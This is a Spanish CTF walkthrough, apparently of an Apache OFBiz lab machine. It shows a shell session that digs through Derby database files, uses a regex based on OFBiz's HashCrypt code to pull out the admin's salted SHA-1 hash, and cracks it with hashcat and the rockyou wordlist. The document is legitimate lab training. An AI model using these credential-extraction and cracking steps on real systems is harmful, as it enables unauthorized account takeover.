framework/security/src/docs/asciidoc/_include/sy-impersonation.adoc
framework/security/src/docs/asciidoc/_include/sy-password-and-JWT.adoc
framework/security/src/docs/asciidoc/security.adoc
framework/security/entitydef/entitymodel.xml
DOCKER.md
.gradle/5.0-rc-5/taskHistory/taskHistory.bin
.gradle/5.0-rc-5/javaCompile/classAnalysis.bin
.gradle/5.0-rc-5/javaCompile/jarAnalysis.bin
.gradle/5.0-rc-5/javaCompile/taskHistory.bin
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/authorizedotnet/AIMPaymentServices.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/eway/EwayServices.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/eway/GatewayRequest.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/clearcommerce/CCPaymentServices.class
build/classes/java/main/org/apache/ofbiz/solr/SolrUtil.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/ups/UpsServices.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/dhl/DhlServices.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/usps/UspsServices.class
build/classes/java/main/org/apache/ofbiz/webapp/event/XmlRpcEventHandler$ServiceRpcHandler.class
build/classes/java/main/org/apache/ofbiz/webapp/event/XmlRpcEventHandler$OfbizRpcAuthHandler.class
build/classes/java/main/org/apache/ofbiz/webapp/webdav/WebDavUtil.class
build/classes/java/main/org/apache/ofbiz/webapp/control/JWTManager.class
build/classes/java/main/org/apache/ofbiz/webapp/control/LoginWorker.class
build/classes/java/main/org/apache/ofbiz/webapp/view/ApacheFopWorker.class
build/classes/java/main/org/apache/ofbiz/entity/datasource/GenericHelperInfo.class
build/classes/java/main/org/apache/ofbiz/entity/config/model/EntityConfig.class
build/classes/java/main/org/apache/ofbiz/entity/config/model/InlineJdbc.class
build/classes/java/main/org/apache/ofbiz/entity/model/ModelEntityChecker.class
build/classes/java/main/org/apache/ofbiz/entity/connection/DBCPConnectionFactory.class
build/classes/java/main/org/apache/ofbiz/entity/jdbc/DatabaseUtil.class
build/classes/java/main/org/apache/ofbiz/entity/GenericDelegator.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/FormStringRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/macro/MacroFormRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/fo/FoFormRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/fo/ScreenFopViewHandler.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFieldVisitor.class
build/classes/java/main/org/apache/ofbiz/widget/model/FieldInfo.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormFieldBuilder.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormField.class
build/classes/java/main/org/apache/ofbiz/widget/model/XmlWidgetFieldVisitor.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormField$PasswordField.class
build/classes/java/main/org/apache/ofbiz/widget/artifact/ArtifactInfoGatherer$FieldInfoGatherer.class
build/classes/java/main/org/apache/ofbiz/widget/test/WidgetMacroLibraryTests.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SimpleFtpClient.class
build/classes/java/main/org/apache/ofbiz/content/ftp/FtpServices.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SecureFtpClient.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SshFtpClient.class
build/classes/java/main/org/apache/ofbiz/product/store/ProductStoreWorker.class
build/classes/java/main/org/apache/ofbiz/webpos/session/WebPosSession.class
build/classes/java/main/org/apache/ofbiz/ldap/cas/OFBizCasAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/activedirectory/OFBizActiveDirectoryAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/commons/AbstractOFBizAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/openldap/OFBizLdapAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/passport/event/LinkedInEvents.class
build/classes/java/main/org/apache/ofbiz/passport/event/GitHubEvents.class
build/classes/java/main/org/apache/ofbiz/passport/user/LinkedInAuthenticator.class
build/classes/java/main/org/apache/ofbiz/passport/user/GitHubAuthenticator.class
build/classes/java/main/org/apache/ofbiz/service/ModelService.class
build/classes/java/main/org/apache/ofbiz/service/engine/XMLRPCClientEngine.class
build/classes/java/main/org/apache/ofbiz/service/config/model/Server.class
build/classes/java/main/org/apache/ofbiz/service/mail/JavaMailContainer.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory$AliasSupportedTransport.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/XmlRpcClient.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory.class
build/classes/java/main/org/apache/ofbiz/service/rmi/socket/ssl/SSLServerSocketFactory.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsListenerFactory.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsQueueListener.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsTopicListener.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsServiceEngine.class
build/classes/java/main/org/apache/ofbiz/service/test/XmlRpcTests.class
build/classes/java/main/org/apache/ofbiz/service/test/AbstractXmlRpcTestCase.class
build/classes/java/main/org/apache/ofbiz/service/ServiceDispatcher.class
build/classes/java/main/org/apache/ofbiz/service/ModelServiceReader.class
build/classes/java/main/org/apache/ofbiz/catalina/container/CatalinaContainer.class
build/classes/java/main/org/apache/ofbiz/catalina/container/SimpleCredentialHandler.class
build/classes/java/main/org/apache/ofbiz/catalina/container/OFBizRealm.class
build/classes/java/main/org/apache/ofbiz/catalina/container/HashedCredentialHandler.class
build/classes/java/main/org/apache/ofbiz/base/crypto/HashCrypt.class
build/classes/java/main/org/apache/ofbiz/base/util/KeyStoreUtil.class
build/classes/java/main/org/apache/ofbiz/base/util/HttpClient.class
build/classes/java/main/org/apache/ofbiz/base/util/FileUtil.class
build/classes/java/main/org/apache/ofbiz/base/util/UtilHttp.class
build/classes/java/main/org/apache/ofbiz/base/util/SSLUtil.class
build/classes/java/main/org/apache/ofbiz/base/component/ComponentConfig$KeystoreInfo.class
build/classes/java/main/org/apache/ofbiz/common/authentication/example/TestFailAuthenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/example/TestPassAuthenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/api/Authenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/AuthHelper.class
build/classes/java/main/org/apache/ofbiz/common/FtpServices.class
build/classes/java/main/org/apache/ofbiz/common/email/EmailServices.class
build/classes/java/main/org/apache/ofbiz/common/login/LdapAuthenticationServices.class
build/classes/java/main/org/apache/ofbiz/common/login/LoginServices.class
build/classes/java/main/org/apache/ofbiz/security/SecurityUtil.class
build/classes/java/main/org/apache/ofbiz/securityext/login/LoginEvents.class
build/distributions/ofbiz.zip
build/distributions/ofbiz.tar
build/reports/checkstyle/main.xml
build/reports/checkstyle/main.html
build/resources/main/entity-config.xsd
build/resources/main/datafiles.xsd
build/resources/main/ofbiz-component.xsd
build/resources/main/service-config.xsd
build/resources/main/widget-form.xsd
build/resources/main/site-conf.xsd
build/resources/main/ldap.xml
build/resources/main/serviceengine.xml
build/resources/main/entityengine.xml
build/libs/ofbiz.jar
README.adoc
themes/common-theme/template/ForgotPassword.ftl
themes/common-theme/template/macro/XmlFormMacroLibrary.ftl
themes/common-theme/template/macro/FoFormMacroLibrary.ftl
themes/common-theme/template/macro/XlsFormMacroLibrary.ftl
themes/common-theme/template/macro/TextFormMacroLibrary.ftl
themes/common-theme/template/macro/HtmlFormMacroLibrary.ftl
themes/common-theme/template/macro/CsvFormMacroLibrary.ftl
themes/common-theme/template/GetSecurityQuestion.ftl
themes/common-theme/template/ChangePassword.ftl
themes/common-theme/template/Login.ftl
themes/common-theme/webapp/common/js/util/application.js
themes/common-theme/webapp/common/js/jquery/jquery-3.5.1.min.js
themes/common-theme/webapp/common/js/jquery/jquery-3.5.1.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/jquery.validate.min.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/lib/jquery.form.min.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/lib/jquery.form.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/jquery.validate.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/src/elrte/js/elRTE.utils.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/js/elrte.min.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/js/elrte.full.js
themes/common-theme/webapp/common/js/jquery/plugins/hotkeys/jquery.hotkeys-0.8.js
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.js
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.min.map
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.min.js
themes/common-theme/widget/CommonScreens.xml
themes/common-theme/widget/Theme.xml
themes/bluelight/webapp/bluelight/style.css
themes/flatgrey/webapp/flatgrey/style.css
themes/rainbowstone/template/ForgotPassword.ftl
themes/rainbowstone/template/GetSecurityQuestion.ftl
themes/rainbowstone/template/ChangePassword.ftl
themes/rainbowstone/template/Login.ftl
themes/rainbowstone/webapp/rainbowstone/style.css
themes/rainbowstone/webapp/rainbowstone/rainbowstone-main-theme.less
themes/rainbowstone/widget/Theme.xml
themes/tomahawk/webapp/tomahawk/css/style.css
docker/docker-entrypoint.sh
docker/examples/postgres-demo/ofbiz-postgres.env
docker/examples/postgres-demo/postgres-initdb.d/10-init-user-db.sh
docker/examples/postgres-demo/postgres.env
docker/templates/postgres-entityengine.xml
plugins/example/config/ExampleUiLabels.xml
plugins/example/config/examplepdf.properties
plugins/example/widget/example/CommonScreens.xml
plugins/example/widget/example/ExampleScreens.xml
plugins/example/widget/example/ExampleForms.xml
plugins/example/testdef/assertdata/TestUserLoginData.xml
plugins/ebaystore/data/helpdata/HELP_EBAY_NewEbayAccount.xml
plugins/ebaystore/data/DemoEbayStoreData.xml
plugins/ebaystore/widget/EbayAccountForms.xml
plugins/ebaystore/widget/EbayStoreForms.xml
plugins/ebaystore/servicedef/services.xml
plugins/solr/webapp/solr/WEB-INF/controller.xml
plugins/solr/webapp/solr/js/lib/jquery.form.js
plugins/solr/webapp/solr/js/lib/jquery-1.7.2.min.js
plugins/solr/webapp/solr/js/require.js
plugins/solr/webapp/solr/libs/angular.js
plugins/solr/webapp/solr/libs/angular.min.js
plugins/solr/webapp/solr/libs/jquery-2.1.3.min.js
plugins/solr/config/solrconfig.properties
plugins/solr/src/main/java/org/apache/ofbiz/solr/SolrUtil.java
plugins/ecommerce/template/customer/ViewProfile.ftl
plugins/ecommerce/template/customer/profile/NewCustomer.ftl
plugins/ecommerce/template/customer/profile/EditProfile.ftl
plugins/ecommerce/template/customer/NewCustomer.ftl
plugins/ecommerce/template/customer/EditGiftCard.ftl
plugins/ecommerce/template/customer/ChangePassword.ftl
plugins/ecommerce/template/survey/MiniSurvey.ftl
plugins/ecommerce/template/survey/GenericResult.ftl
plugins/ecommerce/template/Login.ftl
plugins/ecommerce/template/RequirePasswordChange.ftl
plugins/ecommerce/data/DemoRentalProduct.xml
plugins/ecommerce/data/DemoPurchasing.xml
plugins/ecommerce/data/DemoTestSurveyData.xml
plugins/ecommerce/webapp/ecommerce/images/forms.css
plugins/ecommerce/webapp/ecommerce/WEB-INF/controller.xml
plugins/ecommerce/config/blog.properties
plugins/ecommerce/config/EcommerceUiLabels.xml
plugins/ecommerce/widget/CommonScreens.xml
plugins/ecommerce/widget/CustomerScreens.xml
plugins/ecommerce/groovyScripts/Login.groovy
plugins/ecommerce/groovyScripts/customer/NewCustomer.groovy
plugins/ecommerce/minilang/misc/AffiliateSimpleEvents.xml
plugins/ecommerce/minilang/misc/AffiliateMapProcs.xml
plugins/ecommerce/minilang/customer/QuickAnonCustomerEvents.xml
plugins/ecommerce/minilang/customer/CustomerEvents.xml
plugins/bizness/webapp/biznessweb/lib/jquery/jquery.min.js
plugins/webpos/template/ForgotPassword.ftl
plugins/webpos/template/GetSecurityQuestion.ftl
plugins/webpos/template/payment/PayCreditCard.ftl
plugins/webpos/template/Login.ftl
plugins/webpos/template/RequirePasswordChange.ftl
plugins/webpos/data/DemoRetail.xml
plugins/webpos/webapp/webpos/images/webpos.css
plugins/webpos/webapp/webpos/WEB-INF/controller.xml
plugins/webpos/src/main/java/org/apache/ofbiz/webpos/session/WebPosSession.java
plugins/webpos/widget/CommonScreens.xml
plugins/webpos/groovyScripts/Login.groovy
plugins/multiflex/webapp/multiflex/style.css
plugins/ldap/config/ldap.xml
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/cas/OFBizCasAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/activedirectory/OFBizActiveDirectoryAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/commons/AbstractOFBizAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/commons/InterfaceOFBizAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/openldap/OFBizLdapAuthenticationHandler.java
plugins/scrum/template/includes/DemoTest.ftl
plugins/scrum/data/hookscripts/commit.py
plugins/scrum/data/scrumDemoData.xml
plugins/scrum/config/scrumUiLabels.xml
plugins/scrum/config/revision.properties
plugins/scrum/widget/ResourceForms.xml
plugins/scrum/minilang/ScrumEvents.xml
plugins/scrum/README.md
plugins/passport/webapp/passport/WEB-INF/controller-passport.xml
plugins/passport/src/main/java/org/apache/ofbiz/passport/event/LinkedInEvents.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/event/GitHubEvents.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/user/LinkedInAuthenticator.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/user/GitHubAuthenticator.java
plugins/cmssite/template/ofbiz/OfbizMenu.ftl
plugins/cmssite/template/docbook/roundtrip/dbk2wordml.xsl
plugins/cmssite/template/docbook/roundtrip/template.xml
plugins/cmssite/documents/ApacheOfbizTechnical.xml
plugins/myportal/template/Login.ftl
plugins/myportal/template/RegisterPerson.ftl
plugins/myportal/data/MyPortalDemoData.xml
plugins/myportal/minilang/Events.xml
plugins/projectmgr/ofbiz-component.xml
plugins/projectmgr/data/ProjectMgrDemoPasswordData.xml
build.gradle
.github/workflows/docker-image.yaml
Encontramos unos archivos .dat (archivos de datos que contienen info especifica de un programa/app). Vamos a ver de que tipo de archivo se trata
ofbiz@bizness:/opt/ofbiz$ file runtime/data/derby/ofbiz/seg0/c6010.dat
runtime/data/derby/ofbiz/seg0/c6010.dat: data
Y nos dice que contiene datos
ofbiz@bizness:/opt/ofbiz$ cd runtime/data/derby/ofbiz/seg0/
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ ls
c10001.dat c11691.dat c12d41.dat c143f1.dat c1e01.dat c34a1.dat c4b50.dat c6201.dat c78b1.dat c8f61.dat ca611.dat cbcc1.dat cd361.dat cea1.dat
c10011.dat c116a1.dat c12d51.dat c14401.dat c1e0.dat c34b0.dat c4b61.dat c6210.dat c78c1.dat c8f71.dat ca61.dat cbcd1.dat cd371.dat cea21.dat
c1001.dat c116b1.dat c12d61.dat c14411.dat c1e10.dat c34c1.dat c4b70.dat c621.dat c78d1.dat c8f81.dat ca621.dat cbce1.dat cd381.dat cea31.dat
c10021.dat c116c1.dat c12d71.dat c1441.dat c1e21.dat c34d0.dat c4b81.dat c6221.dat c78e1.dat c8f91.dat ca631.dat cbcf1.dat cd391.dat cea41.dat
c10031.dat c116d1.dat c12d81.dat c14421.dat c1e30.dat c34e1.dat c4b90.dat c6230.dat c78f1.dat c8fa1.dat ca641.dat cbd01.dat cd3a1.dat cea51.dat
c10041.dat c116e1.dat c12d91.dat c14431.dat c1e41.dat c34f0.dat c4ba1.dat c6241.dat c7901.dat c8fb1.dat ca651.dat cbd0.dat cd3b1.dat cea61.dat
c10051.dat c116f1.dat c12da1.dat c14441.dat c1e50.dat c3501.dat c4bb0.dat c6250.dat c790.dat c8fc1.dat ca661.dat cbd11.dat cd3c1.dat cea71.dat
c10061.dat c11701.dat c12db1.dat c14451.dat c1e61.dat c3510.dat c4bc1.dat c6261.dat c7911.dat c8fd1.dat ca671.dat cbd21.dat cd3d1.dat cea81.dat
c10071.dat c1170.dat c12dc1.dat c14461.dat c1e70.dat c351.dat c4bd0.dat c6270.dat c7921.dat c8fe1.dat ca681.dat cbd31.dat cd3e1.dat cea91.dat
c10081.dat c11711.dat c12dd1.dat c14471.dat c1e81.dat c3521.dat c4be1.dat c6281.dat c7931.dat c8ff1.dat ca691.dat cbd41.dat cd3f1.dat ceaa1.dat
c10091.dat c11721.dat c12de1.dat c14481.dat c1e90.dat c3530.dat c4bf0.dat c6290.dat c7941.dat c9001.dat ca6a1.dat cbd51.dat cd401.dat ceab1.dat
c100a1.dat c11731.dat c12df1.dat c14491.dat c1ea1.dat c3541.dat c4c01.dat c62a1.dat c7951.dat c9011.dat ca6b1.dat cbd61.dat cd411.dat ceac1.dat
c100b1.dat c11741.dat c12e01.dat c144a1.dat c1eb0.dat c3550.dat c4c10.dat c62b0.dat c7961.dat c901.dat ca6c1.dat cbd71.dat cd41.dat cead1.dat
c100c1.dat c11751.dat c12e11.dat c144b1.dat c1ec1.dat c3561.dat c4c1.dat c62c1.dat c7971.dat c9021.dat ca6d1.dat cbd81.dat cd421.dat ceae1.dat
c100d1.dat c11761.dat c12e1.dat c144c1.dat c1ed0.dat c3570.dat c4c21.dat c62d0.dat c7981.dat c9031.dat ca6e1.dat cbd91.dat cd431.dat ceaf1.dat
c100e1.dat c11771.dat c12e21.dat c144d1.dat c1ee1.dat c3581.dat c4c30.dat c62e1.dat c7991.dat c9041.dat ca6f1.dat cbda1.dat cd441.dat ceb01.dat
c100f1.dat c11781.dat c12e31.dat c144e1.dat c1ef0.dat c3590.dat c4c41.dat c62f0.dat c79a1.dat c9051.dat ca701.dat cbdb1.dat cd451.dat ceb0.dat
c10101.dat c11791.dat c12e41.dat c144f1.dat c1f01.dat c35a1.dat c4c50.dat c6301.dat c79b1.dat c9061.dat ca70.dat cbdc1.dat cd461.dat ceb11.dat
c1010.dat c117a1.dat c12e51.dat c14501.dat c1f10.dat c35b0.dat c4c61.dat c630.dat c79c1.dat c9071.dat ca711.dat cbdd1.dat cd471.dat ceb21.dat
c10111.dat c117b1.dat c12e61.dat c1450.dat c1f1.dat c35c1.dat c4c70.dat c6310.dat c79d1.dat c9081.dat ca721.dat cbde1.dat cd481.dat ceb31.dat
c10121.dat c117c1.dat c12e71.dat c14511.dat c1f21.dat c35d0.dat c4c81.dat c6321.dat c79e1.dat c9091.dat ca731.dat cbdf1.dat cd491.dat ceb41.dat
c10131.dat c117d1.dat c12e81.dat c14521.dat c1f30.dat c35e1.dat c4c90.dat c6330.dat c79f1.dat c90a1.dat ca741.dat cbe01.dat cd4a1.dat ceb51.dat
c10141.dat c117e1.dat c12e91.dat c14531.dat c1f41.dat c35f0.dat c4ca1.dat c6341.dat c7a01.dat c90b1.dat ca751.dat cbe11.dat cd4b1.dat ceb61.dat
c10151.dat c117f1.dat c12ea1.dat c14541.dat c1f50.dat c3601.dat c4cb0.dat c6350.dat c7a11.dat c90c1.dat ca761.dat cbe1.dat cd4c1.dat ceb71.dat
c10161.dat c11801.dat c12eb1.dat c14551.dat c1f61.dat c3610.dat c4cc1.dat c6361.dat c7a1.dat c90d1.dat ca771.dat cbe21.dat cd4d1.dat ceb81.dat
..........
..........
..........
README_DO_NOT_TOUCH_FILES.txt
c115d1.dat c12c81.dat c14321.dat c1d30.dat c33e1.dat c4a90.dat c6130.dat c77f1.dat c8ea1.dat ca541.dat cbc01.dat cd2a1.dat ce951.dat
c115e1.dat c12c91.dat c14331.dat c1d41.dat c33f0.dat c4aa1.dat c6141.dat c7801.dat c8eb1.dat ca551.dat cbc11.dat cd2b1.dat ce961.dat
c115f1.dat c12ca1.dat c14341.dat c1d50.dat c3401.dat c4ab0.dat c6150.dat c7811.dat c8ec1.dat ca561.dat cbc1.dat cd2c1.dat ce971.dat
c11601.dat c12cb1.dat c14351.dat c1d61.dat c340.dat c4ac1.dat c6161.dat c781.dat c8ed1.dat ca571.dat cbc21.dat cd2d1.dat ce981.dat
c11611.dat c12cc1.dat c14361.dat c1d70.dat c3410.dat c4ad0.dat c6170.dat c7821.dat c8ee1.dat ca581.dat cbc31.dat cd2e1.dat ce991.dat
c1161.dat c12cd1.dat c14371.dat c1d81.dat c3421.dat c4ae1.dat c6181.dat c7831.dat c8ef1.dat ca591.dat cbc41.dat cd2f1.dat ce9a1.dat
c11621.dat c12ce1.dat c14381.dat c1d90.dat c3430.dat c4af0.dat c6190.dat c7841.dat c8f01.dat ca5a1.dat cbc51.dat cd301.dat ce9b1.dat
c11631.dat c12cf1.dat c14391.dat c1da1.dat c3441.dat c4b01.dat c61a1.dat c7851.dat c8f0.dat ca5b1.dat cbc61.dat cd30.dat ce9c1.dat
c11641.dat c12d01.dat c143a1.dat c1db0.dat c3450.dat c4b0.dat c61b0.dat c7861.dat c8f11.dat ca5c1.dat cbc71.dat cd311.dat ce9d1.dat
c11651.dat c12d0.dat c143b1.dat c1dc1.dat c3461.dat c4b10.dat c61c1.dat c7871.dat c8f21.dat ca5d1.dat cbc81.dat cd321.dat ce9e1.dat
c11661.dat c12d11.dat c143c1.dat c1dd0.dat c3470.dat c4b21.dat c61d0.dat c7881.dat c8f31.dat ca5e1.dat cbc91.dat cd331.dat ce9f1.dat
c11671.dat c12d21.dat c143d1.dat c1de1.dat c3481.dat c4b30.dat c61e1.dat c7891.dat c8f41.dat ca5f1.dat cbca1.dat cd341.dat cea01.dat
c11681.dat c12d31.dat c143e1.dat c1df0.dat c3490.dat c4b41.dat c61f0.dat c78a1.dat c8f51.dat ca601.dat cbcb1.dat cd351.dat cea11.dat
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ cat README_DO_NOT_TOUCH_FILES.txt
# *************************************************************************
# *** DO NOT TOUCH FILES IN THIS DIRECTORY! ***
# *** FILES IN THIS DIRECTORY ARE USED BY THE DERBY DATABASE TO STORE ***
# *** USER AND SYSTEM DATA. EDITING, ADDING, OR DELETING FILES IN THIS ***
# *** DIRECTORY WILL CORRUPT THE ASSOCIATED DERBY DATABASE AND MAKE ***
# *** IT NON-RECOVERABLE. ***
# *************************************************************************ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$
Anteriormente al grepear habia una clase que podia decirnos algo
ofbiz@bizness:/opt/ofbiz$ cat framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java
.....
....
....
public static String cryptBytes(String hashType, String salt, byte[] bytes) {
if (hashType == null) {
hashType = "SHA";
}
if (salt == null) {
salt = RandomStringUtils.random(new SecureRandom().nextInt(15) + 1, CRYPT_CHAR_SET);
}
StringBuilder sb = new StringBuilder();
sb.append("$").append(hashType).append("$").append(salt).append("$");
sb.append(getCryptedBytes(hashType, salt, bytes));
return sb.toString();
}
private static String getCryptedBytes(String hashType, String salt, byte[] bytes) {
try {
MessageDigest messagedigest = MessageDigest.getInstance(hashType);
messagedigest.update(salt.getBytes(UtilIO.getUtf8()));
messagedigest.update(bytes);
return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');
} catch (NoSuchAlgorithmException e) {
throw new GeneralRuntimeException("Error while comparing password", e);
}
}
.....
....
....
..
Esta linea del método cryptBytes es interesante porque vemos como se cifra
sb.append("$").append(hashType).append("$").append(salt).append("$");
En el metodo getCryptedBytes es el encergado de realizar el cigrado y el que devuelve el resultado en una cadena de texto codificada en Base 64 URL segura.
return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');
Asi que vamos a aplicar exa expresion regular para encontrar cadenas que parezca seguir el formato de cifrado de contraseñas como se implementa ene el metodo cryptBytes de Java, donde se incluyo un tipo de algorito de hash seguido de un salt.
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ grep -E '\$\w+\$\w+\$' * --text
c54d0.dat: <eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>
c6650.dat:;fPUUUNNNNUUUUUUsystemYN
'""
' :
&6)]
&system
anonymousN
&6,P
&6
&6,P
&6 admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN
,66d
,6
@
(&Sf
()@
()@>
[}f<A6
```
Si observamos el metodo encodeBase64URLSafe ,
La variación segura para URLs del algoritmo Base64 (uP0_QaVBpDWFeo8-dRzDqRwXQ2I) sustituye los caracteres + y / por - y _, respectivamente. Además, no se agrega ningún carácter de relleno al final de la cadena. (uP0/QaVBpDWFeo8+dRzDqRwXQ2I)
Este son 2 ejemplos de SHA que podrian ser
❯ hashcat --example-hashes | less
Hash mode #110
Name................: sha1($pass.$salt)
Category............: Raw Hash salted and/or iterated
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Generic
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: 848952984db93bdd2d0151d4ecca6ea44fcf49e3:30007548152
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
:
Hash mode #120
Name................: sha1($salt.$pass)
Category............: Raw Hash salted and/or iterated
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Generic
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: a428863972744b16afef28e0087fc094b44bb7b1:465727565
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
En esta página podemos hacer este replace de los caracteres, pasarlo de base64 y a hexa
❯ hashcat -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
The following 15 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
110 | sha1($pass.$salt) | Raw Hash salted and/or iterated
120 | sha1($salt.$pass) | Raw Hash salted and/or iterated
4900 | sha1($salt.$pass.$salt) | Raw Hash salted and/or iterated
4520 | sha1($salt.sha1($pass)) | Raw Hash salted and/or iterated
24300 | sha1($salt.sha1($pass.$salt)) | Raw Hash salted and/or iterated
140 | sha1($salt.utf16le($pass)) | Raw Hash salted and/or iterated
4710 | sha1(md5($pass).$salt) | Raw Hash salted and/or iterated
21100 | sha1(md5($pass.$salt)) | Raw Hash salted and/or iterated
4510 | sha1(sha1($pass).$salt) | Raw Hash salted and/or iterated
5000 | sha1(sha1($salt.$pass.$salt)) | Raw Hash salted and/or iterated
130 | sha1(utf16le($pass).$salt) | Raw Hash salted and/or iterated
150 | HMAC-SHA1 (key = $pass) | Raw Hash authenticated
160 | HMAC-SHA1 (key = $salt) | Raw Hash authenticated
5800 | Samsung Android Password/PIN | Operating System
121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce
Please specify the hash-mode with -m [hash-mode].
Started: Thu May 30 16:09:19 2024
Como podemos ver nos saca varios, pero en primera opcion los primeros que pensabamos. Voy a probar con el 110 y el 120
❯ hashcat -a 0 hash -m 120 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i5-9600K CPU @ 3.70GHz, 1436/2937 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 120 (sha1($salt.$pass))
Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:d
Time.Started.....: Thu May 30 16:11:56 2024 (1 sec)
Time.Estimated...: Thu May 30 16:11:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
